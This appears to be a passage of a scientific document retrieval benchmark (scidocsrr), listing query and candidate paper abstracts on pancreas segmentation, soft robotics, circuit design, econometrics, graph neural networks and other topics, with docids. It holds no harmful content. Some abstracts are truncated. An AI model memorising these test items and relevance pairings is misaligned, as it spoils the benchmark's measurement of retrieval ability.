"text": "A self-recovering receiver for encoded and scrambled binary data streams is proposed in this paper. The generating polynomial of the scrambling sequence is known, as well as the encoder structure and coefficients, but the scrambler time offset is unknown. Taking profit of redundancy introduced by the encoder, we proposed a method which is able to estimate the scrambling sequence offset from the observed scrambled stream. The method is based on the projection of the observed data on the encoder orthogonal subspace. Once the offset has been estimated, classical data descrambling and decoding can be used to recover the information stream.",
"title": ""
},
{
"docid": "1cbd13de915d2a4cedd736345ebb2134",
"text": "This paper deals with the design and implementation of a nonlinear control algorithm for the attitude tracking of a four-rotor helicopter known as quadrotor. This algorithm is based on the second order sliding mode technique known as Super-Twisting Algorithm (STA) which is able to ensure robustness with respect to bounded external disturbances. In order to show the effectiveness of the proposed controller, experimental tests were carried out on a real quadrotor. The obtained results show the good performance of the proposed controller in terms of stabilization, tracking and robustness with respect to external disturbances.",
"title": ""
},
{
"docid": "421320aa01ba00a91a843f2c6f710224",
"text": "Visual simulation of natural phenomena has become one of the most important research topics in computer graphics. Such phenomena include water, fire, smoke, clouds, and so on. Recent methods for the simulation of these phenomena utilize techniques developed in computational fluid dynamics. In this paper, the basic equations (Navier-Stokes equations) for simulating these phenomena are briefly described. These basic equations are used to simulate various natural phenomena. This paper then explains our applications of the equations for simulations of smoke, clouds, and aerodynamic sound.",
"title": ""
},
{
"docid": "d4615de80544972d2313c6d80a9e19fd",
"text": "Herein is presented an external capacitorless low-dropout regulator (LDO) that provides high-power-supply rejection (PSR) at all low-to-high frequencies. The LDO is designed to have the dominant pole at the gate of the pass transistor to secure stability without the use of an external capacitor, even when the load current increases significantly. Using the proposed adaptive supply-ripple cancellation (ASRC) technique, in which the ripples copied from the supply are injected adaptively to the body gate, the PSR hump that appears in conventional gate-pole-dominant LDOs can be suppressed significantly. Since the ASRC circuit continues to adjust the magnitude of the injecting ripples to an optimal value, the LDO presented here can maintain high PSRs, irrespective of the magnitude of the load current <inline-formula> <tex-math notation=\"LaTeX\">$I_{L}$ </tex-math></inline-formula>, or the dropout voltage <inline-formula> <tex-math notation=\"LaTeX\">$V_{\\mathrm {DO}}$ </tex-math></inline-formula>. The proposed LDO was fabricated in a 65-nm CMOS process, and it had an input voltage of 1.2 V. With a 240-pF load capacitor, the measured PSRs were less than −36 dB at all frequencies from 10 kHz to 1 GHz, despite changes of <inline-formula> <tex-math notation=\"LaTeX\">$I_{L}$ </tex-math></inline-formula> and <inline-formula> <tex-math notation=\"LaTeX\">$V_{\\mathrm {DO}}$ </tex-math></inline-formula> as well as process, voltage, temperature (PVT) variations.",
"title": ""
},
{
"docid": "b84018deef3a7ff429bf3d84fb5118c9",
"text": "We show that macroeconomic movements have strong effects on the happiness of nations. First, we find that there are clear microeconomic patterns in the psychological well-being levels of a quarter of a million randomly sampled Europeans and Americans from the 1970s to the 1990s. Happiness equations are monotonically increasing in income, and have similar structure in different countries. Second, movements in reported well-being are correlated with changes in macroeconomic variables such as gross domestic product. This holds true after controlling for the personal characteristics of respondents, country fixed effects, year dummies, and country-specific time trends. Third, the paper establishes that recessions create psychic losses that extend beyond the fall in GDP and rise in the number of people unemployed. These losses are large. Fourth, the welfare state appears to be a compensating force: higher unemployment benefits are associated with higher national well-being.",
"title": ""
},
{
"docid": "bdbbe079493bbfec7fb3cb577c926997",
"text": "A large amount of information on the Web is contained in regularly structured objects, which we call data records. Such data records are important because they often present the essential information of their host pages, e.g., lists of products or services. It is useful to mine such data records in order to extract information from them to provide value-added services. Existing automatic techniques are not satisfactory because of their poor accuracies. In this paper, we propose a more effective technique to perform the task. The technique is based on two observations about data records on the Web and a string matching algorithm. The proposed technique is able to mine both contiguous and non-contiguous data records. Our experimental results show that the proposed technique outperforms existing techniques substantially.",
"title": ""
},
{
"docid": "954d0ef5a1a648221ce8eb3f217f4071",
"text": "Deep learning has revolutionized many machine learning tasks in recent years, ranging from image classification and video processing to speech recognition and natural language understanding. The data in these tasks are typically represented in the Euclidean space. However, there is an increasing number of applications where data are generated from non-Euclidean domains and are represented as graphs with complex relationships and interdependency between objects. The complexity of graph data has imposed significant challenges on existing machine learning algorithms. Recently, many studies on extending deep learning approaches for graph data have emerged. In this survey, we provide a comprehensive overview of graph neural networks (GNNs) in data mining and machine learning fields. We propose a new taxonomy to divide the state-of-the-art graph neural networks into different categories. With a focus on graph convolutional networks, we review alternative architectures that have recently been developed; these learning paradigms include graph attention networks, graph autoencoders, graph generative networks, and graph spatial-temporal networks. We further discuss the applications of graph neural networks across various domains and summarize the open source codes and benchmarks of the existing algorithms on different learning tasks. Finally, we propose potential research directions in this",
"title": ""
},
{
"docid": "ed097b44837a57ad0053ae06a95f1543",
"text": "For underwater videos, the performance of object tracking is greatly affected by illumination changes, background disturbances and occlusion. Hence, there is a need to have a robust function that computes image similarity, to accurately track the moving object. In this work, a hybrid model that incorporates the Kalman Filter, a Siamese neural network and a miniature neural network has been developed for object tracking. It was observed that the usage of the Siamese network to compute image similarity significantly improved the robustness of the tracker. Although the model was developed for underwater videos, it was found that it performs well for both underwater and human surveillance videos. A metric has been defined for analyzing detections-to-tracks mapping accuracy. Tracking results have been analyzed using Multiple Object Tracking Accuracy (MOTA) and Multiple Object Tracking Precision (MOTP)metrics.",
"title": ""
},
{
"docid": "0c7b1972a409657dc49b470e7ee4b4c3",
"text": "In this letter, a new subpixel rendering algorithm using the hue-saturation-intensity (HSI)-based color error analysis is proposed for matrix display devices. The proposed method converts an RGB input image into a HSI image, which is a color space based on human color perception, in order to analyze the sampling errors that are caused by subpixel rendering. Then, it computes the difference between the directionally displaced pixels and selects the direction with the minimum difference. Finally, the proposed method adaptively assigns weights to current and neighboring subpixels based on the directional difference. In experiments for various types of test images, the proposed method enhanced the average luminance sharpness by up to 0.224 and the average chrominance blending by up to 7.311 dB, as compared to the benchmark methods.",
"title": ""
},
{
"docid": "342b72bf32937104ae80ae275c8c9585",
"text": "In this paper, we introduce a Radio Frequency IDentification (RFID) based smart shopping system, KONARK, which helps users to checkout items faster and to track purchases in real-time. In parallel, our solution also provides the shopping mall owner with information about user interest on particular items. The central component of KONARK system is a customized shopping cart having a RFID reader which reads RFID tagged items. To provide check-out facility, our system detects in-cart items with almost 100% accuracy within 60s delay by exploiting the fact that the physical level information (RSSI, phase, doppler, read rate etc.) of in-cart RFID tags are different than outside tags. KONARK also detects user interest with 100% accuracy by exploiting the change in physical level parameters of RFID tag on the object user interacted with. In general, KONARK has been shown to perform with reasonably high accuracy in different mobility speeds in a mock-up of a shopping mall isle.",
"title": ""
},
{
"docid": "2f423bc89dba66eb47f0290ea45079c6",
"text": "he implementation of deinstitutionalization in the 1960s and 1970s, and the increasing ascendance of the community support system concept and the practice of psychiatric rehabilitation in the 1980s, have laid the foundation for a new 1990s vision of service delivery for people who have mental illness. Recovery from mental illness is the vision that will guide the mental health system in this decade. This article outlines the fundamental services and assumptions of a recovery-oriented mental health system. As the recovery concept becomes better understood, it could have major implications for how future mental health systems are designed. The seeds of the recovery vision were sown in the aftermath of the era of deinstitutionalization. The failures in the implementation of the policy of deinstitutionalization confronted us with the fact that a person with severe mental illness wants and needs more than just symptom relief. People with severe T CHANGING TOWARD THE FUTURE",
"title": ""
},
{
"docid": "16dae5a68647c9a8aa93b900eb470eb4",
"text": "Saving power in datacenter networks has become a pressing issue. ElasticTree and CARPO fat-tree networks have recently been proposed to reduce power consumption by using sleep mode during the operation stage of the network. In this paper, we address the design stage where the right switch size is evaluated to maximize power saving during the expected operation of the network. Our findings reveal that deploying a large number of small switches is more power-efficient than a small number of large switches when the traffic demand is relatively moderate or when servers exchanging traffic are in close proximity. We also discuss the impact of sleep mode on performance such as packet delay and loss.",
"title": ""
},
{
"docid": "e593e0c88ffb6ca47416147f470c6187",
"text": "Recent research indicates that toddlers can monitor others' conversations, raising the possibility that they can acquire vocabulary in this way. Three studies examined 2-year-olds' (N = 88) ability to learn novel words when overhearing these words used by others. Children aged 2,6 were equally good at learning novel words-both object labels and action verbs-when they were overhearers as when they were directly addressed. For younger 2-year-olds (2,1), this was true for object labels, but the results were less clear for verbs. The findings demonstrate that 2-year-olds can acquire novel words from overheard speech, and highlight the active role played by toddlers in vocabulary acquisition.",
"title": ""
},
{
"docid": "3be0c125aefca31ccaefab9c1d4941ce",
"text": "The midbrain dopamine neurons are hypothesized to provide a physiological correlate of the reward prediction error signal required by current models of reinforcement learning. We examined the activity of single dopamine neurons during a task in which subjects learned by trial and error when to make an eye movement for a juice reward. We found that these neurons encoded the difference between the current reward and a weighted average of previous rewards, a reward prediction error, but only for outcomes that were better than expected. Thus, the firing rate of midbrain dopamine neurons is quantitatively predicted by theoretical descriptions of the reward prediction error signal used in reinforcement learning models for circumstances in which this signal has a positive value. We also found that the dopamine system continued to compute the reward prediction error even when the behavioral policy of the animal was only weakly influenced by this computation.",
"title": ""
}
] | scidocsrr |
2a92b61dabc35abb8b9e5c43b9fd7fae | A Modular Dielectric Elastomer Actuator to Drive Miniature Autonomous Underwater Vehicles | [
{
"docid": "e259e255f9acf3fa1e1429082e1bf1de",
"text": "In this work we describe an autonomous soft-bodied robot that is both self-contained and capable of rapid, continuum-body motion. We detail the design, modeling, fabrication, and control of the soft fish, focusing on enabling the robot to perform rapid escape responses. The robot employs a compliant body with embedded actuators emulating the slender anatomical form of a fish. In addition, the robot has a novel fluidic actuation system that drives body motion and has all the subsystems of a traditional robot onboard: power, actuation, processing, and control. At the core of the fish's soft body is an array of fluidic elastomer actuators. We design the fish to emulate escape responses in addition to forward swimming because such maneuvers require rapid body accelerations and continuum-body motion. These maneuvers showcase the performance capabilities of this self-contained robot. The kinematics and controllability of the robot during simulated escape response maneuvers are analyzed and compared with studies on biological fish. We show that during escape responses, the soft-bodied robot has similar input-output relationships to those observed in biological fish. The major implication of this work is that we show soft robots can be both self-contained and capable of rapid body motion.",
"title": ""
}
] | [
{
"docid": "835dbc5d1c45d991fece5bb29f961bec",
"text": "Use of PET/MR in children has not previously been reported, to the best of our knowledge. Children with systemic malignancies may benefit from the reduced radiation exposure offered by PET/MR. We report our initial experience with PET/MR hybrid imaging and our current established sequence protocol after 21 PET/MR studies in 15 children with multifocal malignant diseases. The effective dose of a PET/MR scan was only about 20% that of the equivalent PET/CT examination. Simultaneous acquisition of PET and MR data combines the advantages of the two previously separate modalities. Furthermore, the technique also enables whole-body diffusion-weighted imaging (DWI) and statements to be made about the biological cellularity and nuclear/cytoplasmic ratio of tumours. Combined PET/MR saves time and resources. One disadvantage of PET/MR is that in order to have an effect, a significantly longer examination time is needed than with PET/CT. In our initial experience, PET/MR has turned out to be an unexpectedly stable and reliable hybrid imaging modality, which generates a complementary diagnostic study of great additional value.",
"title": ""
},
{
"docid": "7146615b79dd39e358dd148e57a01fdb",
"text": "Graphs are one of the key data structures for many real-world computing applications and the importance of graph analytics is ever-growing. While existing software graph processing frameworks improve programmability of graph analytics, underlying general purpose processors still limit the performance and energy efficiency of graph analytics. We architect a domain-specific accelerator, Graphicionado, for high-performance, energy-efficient processing of graph analytics workloads. For efficient graph analytics processing, Graphicionado exploits not only data structure-centric datapath specialization, but also memory subsystem specialization, all the while taking advantage of the parallelism inherent in this domain. Graphicionado augments the vertex programming paradigm, allowing different graph analytics applications to be mapped to the same accelerator framework, while maintaining flexibility through a small set of reconfigurable blocks. This paper describes Graphicionado pipeline design choices in detail and gives insights on how Graphicionado combats application execution inefficiencies on general-purpose CPUs. Our results show that Graphicionado achieves a 1.76-6.54x speedup while consuming 50-100x less energy compared to a state-of-the-art software graph analytics processing framework executing 32 threads on a 16-core Haswell Xeon processor.",
"title": ""
},
{
"docid": "1f004fe1fc51270006ca32961c36a601",
"text": "A clock multiplier for the 600 MHz 72 W (estimated) CMOS Alpha microprocessor is presented. The supply voltage of the analog part of the PLL (VDDA) is provided by an on-chip voltage regulator with a decoupling capacitance. The 3.3 V supply is used to generate the quieter internal supply voltage needed for the sensitive analog part of the PLL and allows the regulator to operate properly even if the 3.3 V supply is noisy. A bandgap voltage reference is used to generate an internal reference for the supply voltage of 2.2 V. The regulator PSRR is always larger than 20 dB in the frequency range of the power supply noise, reducing the noise amplitude on the analog-supply voltage. The minimum measured supply voltage for the regulator is 2.5 V with a regulated output of 2.2 V (without noise generator).",
"title": ""
},
{
"docid": "95ae44469494aff0f511e77d7924ed36",
"text": "In a practical training for the Faculty of Electrical Engineering at Eindhoven University of Technology, a literature search to the past developments concerning the Phase Correlation algorithm was carried out and the algorithm was implemented. The Phase Correlation algorithm is a method for measuring the motion in a video sequence, based on the Fourier shift theorem. It was found that an enhanced implementation of the Phase Correlation algorithm gives very good results, comparable to the results of 3-D Recursive Search (a popular method for motion estimation in consumer electronics equipment). The estimated motion vectors have a close relation to the true motion in a scene, which makes this algorithm very suitable for video format conversion. It is concluded that Phase Correlation and 3-D Recursive Search, together with object based motion estimation, are the best methods for motion estimation currently available.",
"title": ""
},
{
"docid": "d686f12b9c0a9ce7b84fb7834ee935f5",
"text": "Computer aided diagnosis is a hot research field. Systems with the ability to provide a highly accurate diagnosis using little resources are highly desirable. One type of such systems depend on medical images to provide instantaneous diagnosis based on some discriminative features extracted from the images after processing them for noise removal and enhancement. In this paper, we propose a system to automatically detect fractures in hand bones using x-ray images. To the best of our knowledge, this problemhave never been addressed before. For a first attempt to tackle such a difficult problem, our system performed incredibly good with a 91.8% accuracy.",
"title": ""
},
{
"docid": "28d75588fdb4ff45929da124b001e8cc",
"text": "We present a novel training framework for neural sequence models, particularly for grounded dialog generation. The standard training paradigm for these models is maximum likelihood estimation (MLE), or minimizing the cross-entropy of the human responses. Across a variety of domains, a recurring problem with MLE trained generative neural dialog models (G) is that they tend to produce ‘safe’ and generic responses (‘I don’t know’, ‘I can’t tell’). In contrast, discriminative dialog models (D) that are trained to rank a list of candidate human responses outperform their generative counterparts; in terms of automatic metrics, diversity, and informativeness of the responses. However, D is not useful in practice since it can not be deployed to have real conversations with users. Our work aims to achieve the best of both worlds – the practical usefulness of G and the strong performance of D – via knowledge transfer from D to G. Our primary contribution is an end-to-end trainable generative visual dialog model, where G receives gradients from D as a perceptual (not adversarial) loss of the sequence sampled from G. We leverage the recently proposed Gumbel-Softmax (GS) approximation to the discrete distribution – specifically, a RNN augmented with a sequence of GS samplers, coupled with the straight-through gradient estimator to enable end-to-end differentiability. We also introduce a stronger encoder for visual dialog, and employ a self-attention mechanism for answer encoding along with a metric learning loss to aid D in better capturing semantic similarities in answer responses. Overall, our proposed model outperforms state-of-the-art on the VisDial dataset by a significant margin (2.67% on recall@10). The source code can be downloaded from https://github.com/jiasenlu/visDial.pytorch",
"title": ""
},
{
"docid": "e16319df7a10e8b2564c11815f721712",
"text": "A new image feature description based on the local wavelet pattern (LWP) is proposed in this paper to characterize the medical computer tomography (CT) images for content-based CT image retrieval. In the proposed work, the LWP is derived for each pixel of the CT image by utilizing the relationship of center pixel with the local neighboring information. In contrast to the local binary pattern that only considers the relationship between a center pixel and its neighboring pixels, the presented approach first utilizes the relationship among the neighboring pixels using local wavelet decomposition, and finally considers its relationship with the center pixel. A center pixel transformation scheme is introduced to match the range of center value with the range of local wavelet decomposed values. Moreover, the introduced local wavelet decomposition scheme is centrally symmetric and suitable for CT images. The novelty of this paper lies in the following two ways: 1) encoding local neighboring information with local wavelet decomposition and 2) computing LWP using local wavelet decomposed values and transformed center pixel values. We tested the performance of our method over three CT image databases in terms of the precision and recall. We also compared the proposed LWP descriptor with the other state-of-the-art local image descriptors, and the experimental results suggest that the proposed method outperforms other methods for CT image retrieval.",
"title": ""
},
{
"docid": "e996e2622c26782d8fc0023aaaf4d84c",
"text": "This paper proposes that the appropriate measure for capturing the political aspects that matter for social conflict is the level of inclusiveness of the political system. I analyze, theoretically and empirically, the relationship between inclusiveness of the political system and its stability. According to the model, high inclusive systems, such as the proportional representation system, are more stable than low inclusive systems that favor political exclusion, such as the majoritarian system. Empirically, it seems that democracy is not enough to deter social conflicts. The level of inclusiveness of the political system is important in explaining the probability of civil wars. D 2004 Elsevier B.V. All rights reserved. JEL classification: H11; O11",
"title": ""
},
{
"docid": "6965b52a011bc47eb302d7602dd8bcba",
"text": "We have developed a simple and expandable procedure for classification and validation of extracellular data based on a probabilistic model of data generation. This approach relies on an empirical characterization of the recording noise. We first use this noise characterization to optimize the clustering of recorded events into putative neurons. As a second step, we use the noise model again to assess the quality of each cluster by comparing the within-cluster variability to that of the noise. This second step can be performed independently of the clustering algorithm used, and it provides the user with quantitative as well as visual tests of the quality of the classification.",
"title": ""
},
{
"docid": "67cd5acd5ed21b34980acd70253cf124",
"text": "NAND Flash has followed Moore's law of scaling for several generations. With the minimum half-pitch going below 20nm, transition to a 3D NAND cell is required to continue the scaling. This paper describes a floating gate based 3D NAND technology with superior cell characteristics relative to 2D NAND, and CMOS under array for high Gb/mm2 density.",
"title": ""
},
{
"docid": "7495dddc411728986307bae0557b4d50",
"text": "spoken natural language dialog systems a practical approach spoken natural language dialog systems: a practical approach spoken natural language dialog systems a practical approach spoken natural language dialog systems a practical alternative english on kalyani university pdf alongz back to basics fundamental education questions re examined a statistical approach to spoken dialog systems design and mountain: a translation-based approach to natural language implementation of domcat: the domain complexity analysis c algebras and operator theory ceyway large-scale software integration for spoken language and poetry as research exploring second language poetry otoo imperdonable nolia longman english grammar practice with answer key storytown teacher resource book grade 5 ebook | ufcgymmatthews service manual for chevrolet cruze 2010 alongz 70cc atv parts user manual compax land tenure in the colonies wmcir ten pains of death alongs llc bank resolution form wmcir autocad 2007 guide book louduk gator xuv 620i manual firext dl 91a and dl 91b sivaji project x origins white book band oxford level 10 working the samuel johnson encyclopedia iwsun preparatory 2013 memorandam paper 2 sdunn ged practice worksheets with answers eleina dismantled pleasures nolia health care dialogue systems: practical and theoretical cet study guide download ramonapropertymanagers flickering light return to avalore book 0 cafebr miller levine ch 18 test answers codact",
"title": ""
},
{
"docid": "280c39aea4584e6f722607df68ee28dc",
"text": "Statistical parametric speech synthesis (SPSS) using deep neural networks (DNNs) has shown its potential to produce naturally-sounding synthesized speech. However, there are limitations in the current implementation of DNN-based acoustic modeling for speech synthesis, such as the unimodal nature of its objective function and its lack of ability to predict variances. To address these limitations, this paper investigates the use of a mixture density output layer. It can estimate full probability density functions over real-valued output features conditioned on the corresponding input features. Experimental results in objective and subjective evaluations show that the use of the mixture density output layer improves the prediction accuracy of acoustic features and the naturalness of the synthesized speech.",
"title": ""
},
{
"docid": "6d83a242e4e0a0bd0d65c239e0d6777f",
"text": "Traditional clustering algorithms consider all of the dimensions of an input data set equally. However, in the high dimensional data, a common property is that data points are highly clustered in subspaces, which means classes of objects are categorized in subspaces rather than the entire space. Subspace clustering is an extension of traditional clustering that seeks to find clusters in different subspaces categorical data and its corresponding time complexity is analyzed as well. In the proposed algorithm, an additional step is added to the k-modes clustering process to automatically compute the weight of all dimensions in each cluster by using complement entropy. Furthermore, the attribute weight can be used to identify the subsets of important dimensions that categorize different clusters. The effectiveness of the proposed algorithm is demonstrated with real data sets and synthetic data sets. & 2012 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "f15508a8cd342cb6ea0ec2d0328503d7",
"text": "An order book consists of a list of all buy and sell offers, represented by price and quantity, available to a market agent. The order book changes rapidly, within fractions of a second, due to new orders being entered into the book. The volume at a certain price level may increase due to limit orders, i.e. orders to buy or sell placed at the end of the queue, or decrease because of market orders or cancellations. In this paper a high-dimensional Markov chain is used to represent the state and evolution of the entire order book. The design and evaluation of optimal algorithmic strategies for buying and selling is studied within the theory of Markov decision processes. General conditions are provided that guarantee the existence of optimal strategies. Moreover, a value-iteration algorithm is presented that enables finding optimal strategies numerically. As an illustration a simple version of the Markov chain model is calibrated to high-frequency observations of the order book in a foreign exchange market. In this model, using an optimally designed strategy for buying one unit provides a significant improvement, in terms of the expected buy price, over a naive buy-one-unit strategy.",
"title": ""
},
{
"docid": "49388f99a08a41d713b701cf063a71be",
"text": "In this paper, we present the first-of-its-kind machine learning (ML) system, called AI Programmer, that can automatically generate full software programs requiring only minimal human guidance. At its core, AI Programmer uses genetic algorithms (GA) coupled with a tightly constrained programming language that minimizes the overhead of its ML search space. Part of AI Programmer’s novelty stems from (i) its unique system design, including an embedded, hand-crafted interpreter for efficiency and security and (ii) its augmentation of GAs to include instruction-gene randomization bindings and programming language-specific genome construction and elimination techniques. We provide a detailed examination of AI Programmer’s system design, several examples detailing how the system works, and experimental data demonstrating its software generation capabilities and performance using only mainstream CPUs.",
"title": ""
},
{
"docid": "929f294583267ca8cb8616e803687f1e",
"text": "Recent systems for natural language understanding are strong at overcoming linguistic variability for lookup style reasoning. Yet, their accuracy drops dramatically as the number of reasoning steps increases. We present the first formal framework to study such empirical observations, addressing the ambiguity, redundancy, incompleteness, and inaccuracy that the use of language introduces when representing a hidden conceptual space. Our formal model uses two interrelated spaces: a conceptual meaning space that is unambiguous and complete but hidden, and a linguistic symbol space that captures a noisy grounding of the meaning space in the symbols or words of a language. We apply this framework to study the connectivity problem in undirected graphs---a core reasoning problem that forms the basis for more complex multi-hop reasoning. We show that it is indeed possible to construct a high-quality algorithm for detecting connectivity in the (latent) meaning graph, based on an observed noisy symbol graph, as long as the noise is below our quantified noise level and only a few hops are needed. On the other hand, we also prove an impossibility result: if a query requires a large number (specifically, logarithmic in the size of the meaning graph) of hops, no reasoning system operating over the symbol graph is likely to recover any useful property of the meaning graph. This highlights a fundamental barrier for a class of reasoning problems and systems, and suggests the need to limit the distance between the two spaces, rather than investing in multi-hop reasoning with\"many\"hops.",
"title": ""
},
{
"docid": "b059f6d2e9f10e20417f97c05d92c134",
"text": "We present a hybrid analog/digital very large scale integration (VLSI) implementation of a spiking neural network with programmable synaptic weights. The synaptic weight values are stored in an asynchronous Static Random Access Memory (SRAM) module, which is interfaced to a fast current-mode event-driven DAC for producing synaptic currents with the appropriate amplitude values. These currents are further integrated by current-mode integrator synapses to produce biophysically realistic temporal dynamics. The synapse output currents are then integrated by compact and efficient integrate and fire silicon neuron circuits with spike-frequency adaptation and adjustable refractory period and spike-reset voltage settings. The fabricated chip comprises a total of 32 × 32 SRAM cells, 4 × 32 synapse circuits and 32 × 1 silicon neurons. It acts as a transceiver, receiving asynchronous events in input, performing neural computation with hybrid analog/digital circuits on the input spikes, and eventually producing digital asynchronous events in output. Input, output, and synaptic weight values are transmitted to/from the chip using a common communication protocol based on the Address Event Representation (AER). Using this representation it is possible to interface the device to a workstation or a micro-controller and explore the effect of different types of Spike-Timing Dependent Plasticity (STDP) learning algorithms for updating the synaptic weights values in the SRAM module. We present experimental results demonstrating the correct operation of all the circuits present on the chip.",
"title": ""
},
{
"docid": "ef584ca8b3e9a7f8335549927df1dc16",
"text": "Rapid evolution in technology and the internet brought us to the era of online services. E-commerce is nothing but trading goods or services online. Many customers share their good or bad opinions about products or services online nowadays. These opinions become a part of the decision-making process of consumer and make an impact on the business model of the provider. Also, understanding and considering reviews will help to gain the trust of the customer which will help to expand the business. Many users give reviews for the single product. Such thousands of review can be analyzed using big data effectively. The results can be presented in a convenient visual form for the non-technical user. Thus, the primary goal of research work is the classification of customer reviews given for the product in the map-reduce framework.",
"title": ""
},
{
"docid": "544426cfa613a31ac903041afa946d89",
"text": "Recommender systems have the effect of guiding users in a personalized way to interesting objects in a large space of possible options. Content-based recommendation systems try to recommend items similar to those a given user has liked in the past. Indeed, the basic process performed by a content-based recommender consists in matching up the attributes of a user profile in which preferences and interests are stored, with the attributes of a content object (item), in order to recommend to the user new interesting items. This chapter provides an overview of content-based recommender systems, with the aim of imposing a degree of order on the diversity of the different aspects involved in their design and implementation. The first part of the chapter presents the basic concepts and terminology of contentbased recommender systems, a high level architecture, and their main advantages and drawbacks. The second part of the chapter provides a review of the state of the art of systems adopted in several application domains, by thoroughly describing both classical and advanced techniques for representing items and user profiles. The most widely adopted techniques for learning user profiles are also presented. The last part of the chapter discusses trends and future research which might lead towards the next generation of systems, by describing the role of User Generated Content as a way for taking into account evolving vocabularies, and the challenge of feeding users with serendipitous recommendations, that is to say surprisingly interesting items that they might not have otherwise discovered. Pasquale Lops Department of Computer Science, University of Bari “Aldo Moro”, Via E. Orabona, 4, Bari (Italy) e-mail: lops@di.uniba.it Marco de Gemmis Department of Computer Science, University of Bari “Aldo Moro”, Via E. Orabona, 4, Bari (Italy) e-mail: degemmis@di.uniba.it Giovanni Semeraro Department of Computer Science, University of Bari “Aldo Moro”, Via E. Orabona, 4, Bari (Italy) e-mail: semeraro@di.uniba.it",
"title": ""
},
{
"docid": "fa012857ec951bf6365559ab734e9367",
"text": "The aim of this study is to examine the teachers’ attitudes toward the inclusion of students with special educational needs, in public schools and how these attitudes are influenced by their self-efficacy perceptions. The sample is comprised of 416 preschool, primary and secondary education teachers. The results show that, in general, teachers develop positive attitude toward the inclusive education. Higher self-efficacy was associated rather with their capacity to come up against negative experiences at school, than with their attitude toward disabled learners in the classroom and their ability to meet successfully the special educational needs students. The results are consistent with similar studies and reveal the need of establishing collaborative support networks in school districts and the development of teacher education programs, in order to achieve the enrichment of their knowledge and skills to address diverse needs appropriately.",
"title": ""
}
] | scidocsrr |
ac2a1e075ca36eaa89eede0c4179eb1d | Towards dense volumetric pancreas segmentation in CT using 3D fully convolutional networks | [
{
"docid": "ed3b8bfdd6048e4a07ee988f1e35fd21",
"text": "Accurate and automatic organ segmentation from 3D radiological scans is an important yet challenging problem for medical image analysis. Specifically, as a small, soft, and flexible abdominal organ, the pancreas demonstrates very high inter-patient anatomical variability in both its shape and volume. This inhibits traditional automated segmentation methods from achieving high accuracies, especially compared to the performance obtained for other organs, such as the liver, heart or kidneys. To fill this gap, we present an automated system from 3D computed tomography (CT) volumes that is based on a two-stage cascaded approach-pancreas localization and pancreas segmentation. For the first step, we localize the pancreas from the entire 3D CT scan, providing a reliable bounding box for the more refined segmentation step. We introduce a fully deep-learning approach, based on an efficient application of holistically-nested convolutional networks (HNNs) on the three orthogonal axial, sagittal, and coronal views. The resulting HNN per-pixel probability maps are then fused using pooling to reliably produce a 3D bounding box of the pancreas that maximizes the recall. We show that our introduced localizer compares favorably to both a conventional non-deep-learning method and a recent hybrid approach based on spatial aggregation of superpixels using random forest classification. The second, segmentation, phase operates within the computed bounding box and integrates semantic mid-level cues of deeply-learned organ interior and boundary maps, obtained by two additional and separate realizations of HNNs. By integrating these two mid-level cues, our method is capable of generating boundary-preserving pixel-wise class label maps that result in the final pancreas segmentation. Quantitative evaluation is performed on a publicly available dataset of 82 patient CT scans using 4-fold cross-validation (CV). We achieve a (mean ± std. dev.) Dice similarity coefficient (DSC) of 81.27 ± 6.27% in validation, which significantly outperforms both a previous state-of-the art method and a preliminary version of this work that report DSCs of 71.80 ± 10.70% and 78.01 ± 8.20%, respectively, using the same dataset.",
"title": ""
}
] | [
{
"docid": "7765be2199056aed0cb463d215363f83",
"text": "This paper describes a machine learning approach for extracting automatically the tongue contour in ultrasound images. This method is developed in the context of visual articulatory biofeedback for speech therapy. The goal is to provide a speaker with an intuitive visualization of his/her tongue movement, in real-time, and with minimum human intervention. Contrary to most widely used techniques based on active contours, the proposed method aims at exploiting the information of all image pixels to infer the tongue contour. For that purpose, a compact representation of each image is extracted using a PCA-based decomposition technique (named EigenTongue). Artificial neural networks are then used to convert the extracted visual features into control parameters of a PCA-based tongue contour model. The proposed method is evaluated on 9 speakers, using data recorded with the ultrasound probe hold manually (as in the targeted application). Speaker-dependent experiments demonstrated the effectiveness of the proposed method (with an average error of ~1.3 mm when training from 80 manually annotated images), even when the tongue contour is poorly imaged. The performance was significantly lower in speaker-independent experiments (i.e. when estimating contours on an unknown speaker), likely due to anatomical differences across speakers.",
"title": ""
},
{
"docid": "de345f612927b08f3ba2f0c9e8720c93",
"text": "Inputs causing a program to fail are usually large and often contain information irrelevant to the failure. It thus helps debugging to simplify program inputs. The Delta Debugging algorithm is a general technique applicable to minimizing all failure-inducing inputs for more effective debugging. In this paper, we present HDD, a simple but effective algorithm that significantly speeds up Delta Debugging and increases its output quality on tree structured inputs such as XML. Instead of treating the inputs as one flat atomic list, we apply Delta Debugging to the very structure of the data. In particular, we apply the original Delta Debugging algorithm to each level of a program's input, working from the coarsest to the finest levels. We are thus able to prune the large irrelevant portions of the input early. All the generated input configurations are syntactically valid, reducing the number of inconclusive configurations that need to be tested and accordingly the amount of time spent simplifying. We have implemented HDD and evaluated it on a number of real failure-inducing inputs from the GCC and Mozilla bugzilla databases. Our Hierarchical Delta Debugging algorithm produces simpler outputs and takes orders of magnitude fewer test cases than the original Delta Debugging algorithm. It is able to scale to inputs of considerable size that the original Delta Debugging algorithm cannot process in practice. We argue that HDD is an effective tool for automatic debugging of programs expecting structured inputs.",
"title": ""
},
{
"docid": "470e354d364e54fecb39828847e0dc68",
"text": "Online solvers for partially observable Markov decision processes have been applied to problems with large discrete state spaces, but continuous state, action, and observation spaces remain a challenge. This paper begins by investigating double progressive widening (DPW) as a solution to this challenge. However, we prove that this modification alone is not sufficient because the belief representations in the search tree collapse to a single particle causing the algorithm to converge to a policy that is suboptimal regardless of the computation time. The main contribution of the paper is to propose a new algorithm, POMCPOW, that incorporates DPW and weighted particle filtering to overcome this deficiency and attack continuous problems. Simulation results show that these modifications allow the algorithm to be successful where previous approaches fail.",
"title": ""
},
{
"docid": "f4427b472b6e94faadbd49e422ef9200",
